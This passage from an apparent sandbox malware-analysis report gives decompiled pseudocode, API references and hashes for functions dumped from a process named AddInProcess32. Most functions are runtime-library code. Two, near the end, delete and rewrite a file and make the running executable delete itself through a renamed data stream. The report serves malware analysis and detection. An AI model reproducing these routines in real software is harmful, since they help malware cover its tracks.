				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				_t43 = _t21;
				if(_t21 != 0 && E00406360(_t43) != 0) {
					_t33 = GetProcAddress;
					 *((intOrPtr*)(_t40 + 0x1f8)) = GetProcAddress( *(_t41 - 0x1c), "EncodePointer");
					 *((intOrPtr*)(_t40 + 0x1fc)) = GetProcAddress( *(_t41 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x4132a8;
				_t23 = InterlockedIncrement(0x4132a8);
				_push(0xc);
				E00403F58(_t23, _t33);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t25;
				if(_t25 == 0) {
					_t29 =  *0x4138b0; // 0x4137d8
					 *((intOrPtr*)(_t40 + 0x6c)) = _t29;
				}
				_push( *((intOrPtr*)(_t40 + 0x6c)));
				E0040619A();
				 *(_t41 - 4) = 0xfffffffe;
				return E00404ACD(E004065DF());
			}

0x00406529
0x00406529
0x0040652b
0x00406530
0x0040653a
0x00406540
0x00406543
0x00406546
0x00406550
0x00406553
0x00406555
0x00406568
0x00406570
0x00406580
0x00406580
0x00406586
0x00406589
0x00406590
0x0040659c
0x004065a0
0x004065a6
0x004065a8
0x004065ae
0x004065b2
0x004065b5
0x004065ba
0x004065bc
0x004065c1
0x004065c1
0x004065c4
0x004065c7
0x004065cd
0x004065de

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
___addlocaleref.LIBCMT ref: 004065C7

Strings

KERNEL32.DLL, xrefs: 00406535
DecodePointer, xrefs: 00406576
EncodePointer, xrefs: 00406560

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1389861978-2843748187
Opcode ID: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
Instruction ID: 24d076e0758c3fb3c9b827cd62f2c980b6cafb2106825d784225c4fa2649cf60
Opcode Fuzzy Hash: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
Instruction Fuzzy Hash: 12116DB1940705AED720AFB69905B5ABBE0AF00314F10853EE99AB62D0DB78A9448F1D

Uniqueness

Uniqueness Score: -1.00%

Function 00407844 Relevance: 13.7, APIs: 9, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00407844(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t61;
				void* _t64;
				long _t68;
				signed int _t71;
				signed int _t72;
				int* _t74;
				signed int* _t77;
				signed char _t79;
				long _t86;
				signed int _t88;
				int* _t89;
				signed int _t92;
				void* _t98;
				signed int** _t101;
				signed int _t102;
				void* _t106;
				int _t107;
				int _t109;
				void** _t112;
				signed int _t114;
				void** _t118;
				void* _t119;

				_t102 = __edx;
				_push(0x54);
				_push(0x411b00);
				E00404A88(__ebx, __edi, __esi);
				 *(_t119 - 4) = 0;
				GetStartupInfoA(_t119 - 0x64);
				 *(_t119 - 4) = 0xfffffffe;
				_push(0x38);
				_t109 = 0x20;
				_push(_t109);
				_t61 = E00407C87();
				if(_t61 == 0) {
					L45:
					_t62 = _t61 | 0xffffffff;
					__eflags = _t61 | 0xffffffff;
					L46:
					return E00404ACD(_t62);
				}
				 *0x415ae0 = _t61;
				 *0x415ac8 = _t109;
				_t4 = _t61 + 0x700; // 0x700
				_t92 = _t4;
				while(_t61 < _t92) {
					 *((char*)(_t61 + 4)) = 0;
					 *_t61 =  *_t61 | 0xffffffff;
					 *((char*)(_t61 + 5)) = 0xa;
					 *((intOrPtr*)(_t61 + 8)) = 0;
					 *((char*)(_t61 + 0x24)) = 0;
					 *((char*)(_t61 + 0x25)) = 0xa;
					 *((char*)(_t61 + 0x26)) = 0xa;
					_t61 = _t61 + 0x38;
					_t92 =  *0x415ae0 + 0x700;
					__eflags = _t92;
				}
				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
					L26:
					_t88 = 0;
					do {
						_t112 = _t88 * 0x38 +  *0x415ae0;
						_t64 =  *_t112;
						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
							_t112[1] = 0x81;
							__eflags = _t88;
							if(_t88 != 0) {
								asm("sbb eax, eax");
								_t68 =  ~(_t88 - 1) + 0xfffffff5;
								__eflags = _t68;
							} else {
								_t68 = 0xfffffff6;
							}
							_t106 = GetStdHandle(_t68);
							__eflags = _t106 - 0xffffffff;
							if(_t106 == 0xffffffff) {
								L42:
								_t57 =  &(_t112[1]);
								 *_t57 = _t112[1] | 0x00000040;
								__eflags =  *_t57;
								 *_t112 = 0xfffffffe;
								goto L43;
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									goto L42;
								}
								_t71 = GetFileType(_t106);
								__eflags = _t71;
								if(_t71 == 0) {
									goto L42;
								}
								 *_t112 = _t106;
								_t72 = _t71 & 0x000000ff;
								__eflags = _t72 - 2;
								if(__eflags != 0) {
									__eflags = _t72 - 3;
									if(__eflags == 0) {
										_t52 =  &(_t112[1]);
										 *_t52 = _t112[1] | 0x00000008;
										__eflags =  *_t52;
									}
								} else {
									_t112[1] = _t112[1] | 0x00000040;
								}
								_push(0xfa0);
								_t54 =  &(_t112[3]); // -4283092
								_t61 = E00407B82(_t88, _t102, _t106, _t112, __eflags);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L45;
								} else {
									_t112[2] = _t112[2] + 1;
									goto L43;
								}
							}
						} else {
							_t112[1] = _t112[1] | 0x00000080;
						}
						L43:
						_t88 = _t88 + 1;
					} while (_t88 < 3);
					SetHandleCount( *0x415ac8);
					_t62 = 0;
					goto L46;
				}
				_t74 =  *(_t119 - 0x30);
				if(_t74 == 0) {
					goto L26;
				}
				_t107 =  *_t74;
				_t89 =  &(_t74[1]);
				 *(_t119 - 0x1c) = _t89 + _t107;
				if(_t107 >= 0x800) {
					_t107 = 0x800;
				}
				_t114 = 1;
				while( *0x415ac8 < _t107) {
					_t77 = E00407C87(0x20, 0x38);
					__eflags = _t77;
					if(__eflags == 0) {
						_t107 =  *0x415ac8;
						L17:
						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
						if(_t107 <= 0) {
							goto L26;
						} else {
							goto L18;
						}
						do {
							L18:
							_t98 =  *( *(_t119 - 0x1c));
							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
								_t79 =  *_t89;
								if((_t79 & 0x00000001) == 0) {
									goto L25;
								}
								if((_t79 & 0x00000008) != 0) {
									L23:
									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x38 + 0x415ae0[ *(_t119 - 0x20) >> 5];
									 *_t118 =  *( *(_t119 - 0x1c));
									_t118[1] =  *_t89;
									_push(0xfa0);
									_t39 =  &(_t118[3]); // 0xc
									_t61 = E00407B82(_t89, _t102, _t107, _t118, _t132);
									if(_t61 == 0) {
										goto L45;
									}
									_t118[2] = _t118[2] + 1;
									goto L25;
								}
								_t86 = GetFileType(_t98);
								_t132 = _t86;
								if(_t86 == 0) {
									goto L25;
								}
								goto L23;
							}
							L25:
							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
							_t89 =  &(_t89[0]);
							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
						} while ( *(_t119 - 0x20) < _t107);
						goto L26;
					}
					_t101 =  &(0x415ae0[_t114]);
					 *_t101 = _t77;
					 *0x415ac8 =  *0x415ac8 + 0x20;
					_t18 =  &(_t77[0x1c0]); // 0x700
					_t102 = _t18;
					while(1) {
						__eflags = _t77 - _t102;
						if(_t77 >= _t102) {
							break;
						}
						_t77[1] = 0;
						 *_t77 =  *_t77 | 0xffffffff;
						_t77[1] = 0xa;
						_t77[2] = _t77[2] & 0x00000000;
						_t77[9] = _t77[9] & 0x00000080;
						_t77[9] = 0xa;
						_t77[9] = 0xa;
						_t77 =  &(_t77[0xe]);
						_t102 =  &(( *_t101)[0x1c0]);
						__eflags = _t102;
					}
					_t114 = _t114 + 1;
					__eflags = _t114;
				}
				goto L17;
			}

0x00407844
0x00407844
0x00407846
0x0040784b
0x00407852
0x00407859
0x0040785f
0x00407866
0x0040786a
0x0040786b
0x0040786c
0x00407875
0x00407a7b
0x00407a7b
0x00407a7b
0x00407a7e
0x00407a83
0x00407a83
0x0040787b
0x00407880
0x00407886
0x00407886
0x004078b7
0x0040788e
0x00407892
0x00407895
0x00407899
0x0040789c
0x004078a0
0x004078a4
0x004078a8
0x004078b1
0x004078b1
0x004078b1
0x004078bf
0x004079c2
0x004079c2
0x004079c4
0x004079c9
0x004079cf
0x004079d4
0x004079e1
0x004079e5
0x004079e7
0x004079f3
0x004079f5
0x004079f5
0x004079e9
0x004079eb
0x004079eb
0x004079ff
0x00407a01
0x00407a04
0x00407a49
0x00407a49
0x00407a49
0x00407a49
0x00407a4d
0x00000000
0x00407a06
0x00407a06
0x00407a08
0x00000000
0x00000000
0x00407a0b
0x00407a11
0x00407a13
0x00000000
0x00000000
0x00407a15
0x00407a17
0x00407a1c
0x00407a1f
0x00407a27
0x00407a2a
0x00407a2c
0x00407a2c
0x00407a2c
0x00407a2c
0x00407a21
0x00407a21
0x00407a21
0x00407a30
0x00407a35
0x00407a39
0x00407a40
0x00407a42
0x00000000
0x00407a44
0x00407a44
0x00000000
0x00407a44
0x00407a42
0x004079db
0x004079db
0x004079db
0x00407a53
0x00407a53
0x00407a54
0x00407a63
0x00407a69
0x00000000
0x00407a69
0x004078c5
0x004078ca
0x00000000
0x00000000
0x004078d0
0x004078d2
0x004078d8
0x004078e2
0x004078e4
0x004078e4
0x004078e8
0x0040793d
0x004078ef
0x004078f6
0x004078f8
0x00407947
0x0040794d
0x0040794d
0x00407953
0x00000000
0x00000000
0x00000000
0x00000000
0x00407955
0x00407955
0x00407958
0x0040795d
0x00407964
0x00407968
0x00000000
0x00000000
0x0040796c
0x00407979
0x00407987
0x00407993
0x00407997
0x0040799a
0x0040799f
0x004079a3
0x004079ac
0x00000000
0x00000000
0x004079b2
0x00000000
0x004079b2
0x0040796f
0x00407975
0x00407977
0x00000000
0x00000000
0x00000000
0x00407977
0x004079b5
0x004079b5
0x004079b8
0x004079b9
0x004079bd
0x00000000
0x00407955
0x004078fa
0x00407901
0x00407903
0x0040790a
0x0040790a
0x00407938
0x00407938
0x0040793a
0x00000000
0x00000000
0x00407912
0x00407916
0x00407919
0x0040791d
0x00407921
0x00407925
0x00407929
0x0040792d
0x00407932
0x00407932
0x00407932
0x0040793c
0x0040793c
0x0040793c
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 00407859
__calloc_crt.LIBCMT ref: 0040786C

Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC

__calloc_crt.LIBCMT ref: 004078EF
GetFileType.KERNEL32(00000038), ref: 0040796F
___crtInitCritSecAndSpinCount.LIBCMT ref: 004079A3
GetStdHandle.KERNEL32(-000000F6), ref: 004079F9
GetFileType.KERNEL32(00000000), ref: 00407A0B
___crtInitCritSecAndSpinCount.LIBCMT ref: 00407A39
SetHandleCount.KERNEL32 ref: 00407A63

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
String ID:
API String ID: 1318386821-0
Opcode ID: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
Instruction ID: 69dbfb245cb0b330f8ea7ce656b2dbe2117018d0c8ec9728b90aae803ce677d5
Opcode Fuzzy Hash: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
Instruction Fuzzy Hash: 24610AB1E4C7418ED7108B78C844B567BA0AF52334F29837AD4A5BB2E1D73CB845CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC9 Relevance: 10.7, APIs: 7, Instructions: 158
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00405CC9(void* __ecx, void* __eflags, int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t53;
				int _t56;
				signed char _t59;
				intOrPtr _t61;
				short* _t62;
				int _t65;
				signed int _t66;
				signed char* _t76;
				signed int _t79;
				intOrPtr _t81;
				void* _t82;
				signed int _t85;
				intOrPtr* _t86;
				int _t90;
				signed char _t91;
				signed int _t92;
				int _t93;
				int _t97;
				signed int _t99;
				signed int _t104;
				void* _t108;
				intOrPtr* _t110;
				signed int _t112;

				_t53 =  *0x413004; // 0x98fc836b
				_v8 = _t53 ^ _t112;
				_t81 = _a8;
				_t97 = E00405C4F(_a4);
				_t117 = _t97;
				_a4 = _t97;
				if(_t97 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x4136d8)) - _t97;
						if( *((intOrPtr*)(_t56 + 0x4136d8)) == _t97) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t97 - 0xfde8;
							if(_t97 == 0xfde8) {
								L35:
								_t65 = _t56 | 0xffffffff;
								__eflags = _t65;
							} else {
								__eflags = _t97 - 0xfde9;
								if(_t97 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t97,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x4144b0;
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E00409280(_t97, _t81 + 0x1c, 0, 0x101);
											__eflags = _v28 - 1;
											 *(_t81 + 4) = _t97;
											 *((intOrPtr*)(_t81 + 0xc)) = 0;
											if(_v28 <= 1) {
												 *((intOrPtr*)(_t81 + 8)) = 0;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t110 =  &_v21;
													while(1) {
														_t91 =  *_t110;
														__eflags = _t91;
														if(_t91 == 0) {
															goto L29;
														}
														_t79 =  *(_t110 - 1) & 0x000000ff;
														_t92 = _t91 & 0x000000ff;
														while(1) {
															__eflags = _t79 - _t92;
															if(_t79 > _t92) {
																break;
															}
															 *(_t81 + _t79 + 0x1d) =  *(_t81 + _t79 + 0x1d) | 0x00000004;
															_t79 = _t79 + 1;
															__eflags = _t79;
														}
														_t110 = _t110 + 2;
														__eflags =  *(_t110 - 1);
														if( *(_t110 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t76 = _t81 + 0x1e;
												_t90 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t90 = _t90 - 1;
													__eflags = _t90;
												} while (_t90 != 0);
												 *((intOrPtr*)(_t81 + 0xc)) = E0040599D( *(_t81 + 4));
												 *((intOrPtr*)(_t81 + 8)) = 1;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											E00405A21(_t81);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E00409280(_t97, _t81 + 0x1c, 0, 0x101);
					_t85 = _v32 * 0x30;
					_v36 = 0;
					_t104 = _t85 + 0x4136e8;
					_v32 = _t104;
					while(1) {
						L21:
						__eflags =  *_t104;
						if( *_t104 == 0) {
							break;
						}
						_t59 =  *(_t104 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t99 =  *_t104 & 0x000000ff;
							_t66 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t99 - _t66;
								if(_t99 > _t66) {
									break;
								}
								 *(_t81 + _t99 + 0x1d) =  *(_t81 + _t99 + 0x1d) |  *(_v36 + 0x4136d4);
								_t66 =  *(_t104 + 1) & 0x000000ff;
								_t99 = _t99 + 1;
								__eflags = _t99;
							}
							_t97 = _a4;
							_t104 = _t104 + 2;
							__eflags = _t104;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t104 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t104;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t81 + 4) = _t97;
					 *((intOrPtr*)(_t81 + 8)) = 1;
					_t61 = E0040599D(_t97);
					 *((intOrPtr*)(_t81 + 0xc)) = _t61;
					_t62 = _t81 + 0x10;
					_t86 = _t85 + 0x4136dc;
					_t93 = 6;
					do {
						 *_t62 =  *_t86;
						_t86 = _t86 + 2;
						_t62 = _t62 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L25;
				} else {
					L1:
					E004059CC(_t81, _t117);
					L2:
					_t65 = 0;
				}
				L36:
				_pop(_t108);
				_pop(_t82);
				E0040318A(_t65, _t82, _v8 ^ _t112, _t108);
				return _t65;
			}

0x00405ccf
0x00405cd6
0x00405cda
0x00405ce7
0x00405ceb
0x00405ced
0x00405cf0
0x00405d00
0x00405d03
0x00405d03
0x00405d05
0x00405d05
0x00405d0b
0x00000000
0x00000000
0x00405d11
0x00405d14
0x00405d17
0x00405d1c
0x00000000
0x00405d1e
0x00405d1e
0x00405d24
0x00405e90
0x00405e90
0x00405e90
0x00405d2a
0x00405d2a
0x00405d30
0x00000000
0x00405d36
0x00405d3a
0x00405d40
0x00405d42
0x00000000
0x00405d48
0x00405d4d
0x00405d53
0x00405d55
0x00405e84
0x00405e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d5b
0x00405d65
0x00405d70
0x00405d73
0x00405d76
0x00405d79
0x00405e77
0x00405d7f
0x00405d7f
0x00405d83
0x00405d89
0x00405d8c
0x00405d8c
0x00405d8e
0x00405d90
0x00000000
0x00000000
0x00405d96
0x00405d9a
0x00405e48
0x00405e48
0x00405e4a
0x00000000
0x00000000
0x00405e42
0x00405e47
0x00405e47
0x00405e47
0x00405e4d
0x00405e4e
0x00405e52
0x00000000
0x00000000
0x00000000
0x00405e52
0x00405d8c
0x00405e58
0x00405e58
0x00405e5b
0x00405e60
0x00405e60
0x00405e63
0x00405e64
0x00405e64
0x00405e64
0x00405e6f
0x00405e72
0x00405e72
0x00405e7f
0x00405e80
0x00405e81
0x00405e36
0x00405e38
0x00000000
0x00405e38
0x00405d55
0x00405d42
0x00405d30
0x00405d24
0x00000000
0x00405d1c
0x00405dac
0x00405db7
0x00405dba
0x00405dbd
0x00405dc3
0x00405df2
0x00405df2
0x00405df2
0x00405df5
0x00000000
0x00000000
0x00405dc8
0x00405dcb
0x00405dcd
0x00405dcf
0x00405dd2
0x00405de9
0x00405de9
0x00405deb
0x00000000
0x00000000
0x00405de0
0x00405de4
0x00405de8
0x00405de8
0x00405de8
0x00405ded
0x00405df1
0x00405df1
0x00000000
0x00405df1
0x00000000
0x00405dcd
0x00405dfa
0x00405dfd
0x00405e00
0x00405e04
0x00405e07
0x00000000
0x00000000
0x00405e0b
0x00405e0e
0x00405e15
0x00405e1c
0x00405e1f
0x00405e22
0x00405e28
0x00405e29
0x00405e2d
0x00405e30
0x00405e32
0x00405e33
0x00405e33
0x00405e33
0x00000000
0x00405cf2
0x00405cf2
0x00405cf4
0x00405cf9
0x00405cf9
0x00405cf9
0x00405e93
0x00405e97
0x00405e9a
0x00405e9b
0x00405ea1

APIs

getSystemCP.LIBCMT ref: 00405CE2

Part of subcall function 00405C4F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405C5C
Part of subcall function 00405C4F: GetOEMCP.KERNEL32(00000000), ref: 00405C76

setSBCS.LIBCMT ref: 00405CF4

Part of subcall function 004059CC: _memset.LIBCMT ref: 004059DF

IsValidCodePage.KERNEL32(-00000030), ref: 00405D3A
GetCPInfo.KERNEL32(00000000,?), ref: 00405D4D
_memset.LIBCMT ref: 00405D65
setSBUpLow.LIBCMT ref: 00405E38

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
String ID:
API String ID: 2658552758-0
Opcode ID: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
Instruction ID: d2136bea0d1a2f065ec75707fb5b56249d955542dcdf0261cb1fe3d024273208
Opcode Fuzzy Hash: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
Instruction Fuzzy Hash: BC5100719046549BDB258F65C8846BFBBB5EF04304F14847BD886BF282C63C8A42CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 02B53B3F Relevance: 10.6, APIs: 7, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02B53B3F(void* __ebx, WCHAR* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				void _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				long _v48;
				WCHAR* _v52;
				signed int _t27;
				void* _t30;
				void* _t52;
				signed int _t59;
				signed int _t71;
				long _t72;
				void* _t75;
				WCHAR* _t76;
				void* _t77;
				signed int _t78;

				_t27 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t27 ^ _t78;
				_t75 = __edx;
				_v52 = __ecx;
				_v40 = _v40 & 0;
				_v44 = _v44 & 0;
				_v36 = 0;
				_t30 = E02B529B2(__ecx,  &_v40,  &_v44);
				_t52 = _v40;
				if(_t30 != 0) {
					if(( *__edx | __edx[1]) != 0 || (__edx[2] | __edx[3]) != 0) {
						L4:
						_t59 = 6;
						memcpy( &_v32, _t75, _t59 << 2);
						_t71 = _v44;
						if(E02B51CC7(_t52, _t52, _t71, _t71, _t75, _t85,  &_v32) == 0) {
							L11:
						} else {
							_t76 = _v52;
							_t72 = _t71 - 8;
							DeleteFileW(_t76);
							_t77 = CreateFileW(_t76, 0x10000000, 0, 0, 2, 0, 0);
							if(_t77 == 0xffffffff) {
								goto L11;
							} else {
								_v48 = _v48 & 0x00000000;
								if(WriteFile(_t77, _t52, _t72,  &_v48, 0) == 0 || _v48 != _t72) {
									CloseHandle(_t77);
									goto L11;
								} else {
									CloseHandle(_t77);
									goto L9;
								}
							}
						}
					} else {
						_t85 = __edx[4] | __edx[5];
						if((__edx[4] | __edx[5]) != 0) {
							goto L4;
						}
					}
				}
				if(_t52 != 0) {
					HeapFree(GetProcessHeap(), 0, _t52);
				}
				return E02B53C33(_v8 ^ _t78);
			}

0x02b53b45
0x02b53b4c
0x02b53b53
0x02b53b59
0x02b53b61
0x02b53b64
0x02b53b6a
0x02b53b6d
0x02b53b72
0x02b53b78
0x02b53b83
0x02b53b95
0x02b53b97
0x02b53b9b
0x02b53b9d
0x02b53bb0
0x02b53c09
0x02b53bb2
0x02b53bb2
0x02b53bb5
0x02b53bb9
0x02b53bd3
0x02b53bd8
0x00000000
0x02b53bda
0x02b53bda
0x02b53bef
0x02b53c03
0x00000000
0x02b53bf6
0x02b53bf7
0x00000000
0x02b53bf7
0x02b53bef
0x02b53bd8
0x02b53b8d
0x02b53b90
0x02b53b93
0x00000000
0x00000000
0x02b53b93
0x02b53b83
0x02b53c0e
0x02b53c1a
0x02b53c1a
0x02b53c32

APIs

Part of subcall function 02B529B2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
Part of subcall function 02B529B2: GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
Part of subcall function 02B529B2: CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE

DeleteFileW.KERNEL32(?,0000014F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B512AA), ref: 02B53BB9
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B53BCD
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B53BE7
CloseHandle.KERNEL32(00000000), ref: 02B53BF7
CloseHandle.KERNEL32(00000000), ref: 02B53C03
GetProcessHeap.KERNEL32(00000000,?,0000014F,00000000,?), ref: 02B53C13
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B512AA,?,00000000), ref: 02B53C1A

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: File$CloseHandle$CreateHeap$DeleteFreeProcessSizeWrite
String ID:
API String ID: 4205881660-0
Opcode ID: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
Instruction ID: 8118c94e3ea83e338effb02e91c85935fc12eebfcfe8035b735b4269fc43f21c
Opcode Fuzzy Hash: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
Instruction Fuzzy Hash: 36318F32E00328AFDB11DF68D844BEEB7F9EF48361F144599E915EB240CB30A9458B64

Uniqueness

Uniqueness Score: -1.00%

Function 02B52D50 Relevance: 10.6, APIs: 7, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02B52D50(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v528;
				char _v548;
				intOrPtr _v552;
				char _v560;
				char _v561;
				signed int _t14;
				intOrPtr _t24;
				char* _t28;
				void* _t48;
				signed int _t49;

				_t14 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t14 ^ _t49;
				E02B52CE7(E02B52CE7(_t14 ^ _t49,  &_v560, 0x20),  &_v561, 1);
				GetModuleFileNameW(0,  &_v528, 0x104);
				_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0);
				if(_t48 != 0xffffffff) {
					_t24 = 4;
					_v552 = _t24;
					E02B52CC6( &_v548, L":y", _t24);
					_t28 =  &_v560;
					__imp__SetFileInformationByHandle(_t48, 3, _t28, _v552 + 0x10);
					if(_t28 == 0) {
						L4:
						CloseHandle(_t48);
					} else {
						CloseHandle(_t48);
						_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0);
						if(_t48 != 0xffffffff) {
							_v561 = 1;
							__imp__SetFileInformationByHandle(_t48, 4,  &_v561, 1);
							goto L4;
						}
					}
				}
				return E02B53C33(_v8 ^ _t49);
			}

0x02b52d59
0x02b52d60
0x02b52d7f
0x02b52d93
0x02b52db5
0x02b52dba
0x02b52dc2
0x02b52dc9
0x02b52dd5
0x02b52de7
0x02b52df1
0x02b52e01
0x02b52e46
0x02b52e47
0x02b52e03
0x02b52e04
0x02b52e24
0x02b52e29
0x02b52e33
0x02b52e3e
0x00000000
0x02b52e44
0x02b52e29
0x02b52e01
0x02b52e5b

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
CloseHandle.KERNEL32(00000000), ref: 02B52E04
CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
CloseHandle.KERNEL32(00000000), ref: 02B52E47

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: File$Handle$CloseCreateInformation$ModuleName
String ID:
API String ID: 4136099801-0
Opcode ID: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
Instruction ID: 451fee0f2823fa6e798d77c0a79a1ad60c90258088eab8019a44a33cff32ae2a
